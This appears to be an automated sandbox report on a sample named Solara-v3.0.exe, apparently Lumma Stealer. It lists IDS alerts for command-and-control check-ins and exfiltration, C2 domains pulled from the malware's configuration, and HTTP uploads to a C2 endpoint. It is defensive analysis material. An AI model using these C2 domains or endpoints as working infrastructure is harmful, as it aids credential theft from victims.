                    Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.5:56762 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.5:57700 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49708 -> 23.55.153.106:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49709 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49710 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49711 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49727 -> 104.21.66.86:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: screwamusresz.buzz
                    Source: Malware configuration extractorURLs: mindhandru.buzz
                    Source: Malware configuration extractorURLs: inherineau.buzz
                    Source: Malware configuration extractorURLs: cashfuzysao.buzz
                    Source: Malware configuration extractorURLs: scentniej.buzz
                    Source: Malware configuration extractorURLs: rebuildeso.buzz
                    Source: Malware configuration extractorURLs: prisonyfork.buzz
                    Source: Malware configuration extractorURLs: appliacnesot.buzz
                    Source: Malware configuration extractorURLs: hummskitnj.buzz
                    Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                    Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 23.55.153.106:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.66.86:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49727 -> 104.21.66.86:443
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YGVW96CCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12779Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G5YA9UVL8817User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15045Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3E8GBOWGOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20517Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6TP36CE1PS1S0XVXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1262Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4BTBIVQQDUXSJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 565698Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                    Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                    Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                    Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                    Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                    Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                    Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                    Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                    Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: Solara-v3.0.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: Solara-v3.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: Solara-v3.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: Solara-v3.0.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: Solara-v3.0.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: Solara-v3.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: Solara-v3.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: Solara-v3.0.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: Solara-v3.0.exeString found in binary or memory: http://ocsp.digicert.com0
                    Source: Solara-v3.0.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: Solara-v3.0.exeString found in binary or memory: http://ocsp.entrust.net02
                    Source: Solara-v3.0.exeString found in binary or memory: http://ocsp.entrust.net03
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Solara-v3.0.exeString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Solara-v3.0.exeString found in binary or memory: http://www.entrust.net/rpa03
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appliacnesot.buzz/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cashfuzysao.buzz/apiB
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/g
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
